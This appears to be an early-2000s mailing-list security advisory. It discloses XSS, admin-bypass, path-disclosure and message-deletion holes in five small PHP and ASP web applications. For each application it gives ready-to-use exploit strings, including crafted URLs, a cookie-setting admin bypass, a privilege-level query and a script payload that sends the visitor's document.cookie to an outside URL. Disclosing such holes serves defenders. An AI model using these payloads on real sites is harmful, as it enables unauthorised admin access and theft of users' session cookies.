Security holes : PHP Image View, NewsPro, Photo DB, As_web, GuestBook

[frog frog <leseulfrog () hotmail com>]

Hi all :)

1) PHP Image View 1.0
http://www.onlinetools.org

Problems :
- XSS
- phpinfo();

Exploits :
- /phpimageview.php?pw=show
- /phpimageview.php?pic=javascript:alert(document.domain)

2) NewsPro 1.01
http://www.aspbin.co.uk

Problem :
- Admin access

Exploit :
- Set cookie "logged,true" on the administration

3) Photo DB 1.4
http://www.brokenbytes.org

Problem :
- Admin access

Exploit :
- /[THEADMINSPAGE]?
PHPSESSID=abc123&Time=9999999999999&rmtusername=hop&rmtpassw
ord=hop&accessevel=-5


4) As_web.exe 1 & 4
http://www.asksam.com

Problems :
- XSS
- Path Disclosure

Exploits :
- http://www.host.com/as_web.exe?Command=search&file=non-
existant-file&request=&MaxHits=10&NumLines=1

-http://www.host.com/as_web.exe?non-existant
-http://www.host.com/as_web4.exe?Command=First&File=non-
existant-file

- /as_web4.exe?existant-ask-
file!!.ask+B+<script>ANYSCRIPT</script>

-/as_web.exe?existant-ask-
file!!.ask+B+<script>ANYSCRIPT<script>


5) GuestBook 1.00
http://www.aspjar.com

Problems :
- Message removing
- XSS

Exploits :
- /admin/delete.asp
- <script>window.open
('http://www.url.com/?'+document.cookie)</script> in "web 
site" on a post

More details :
in french :
http://www.ifrance.com/kitetoua/tuto/5holes4.txt
Translated by google :
http://translate.google.com/translate?u=http%3A%2F%
2Fwww.ifrance.com%2Fkitetoua%2Ftuto%
2F5holes4.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools


frog-m@n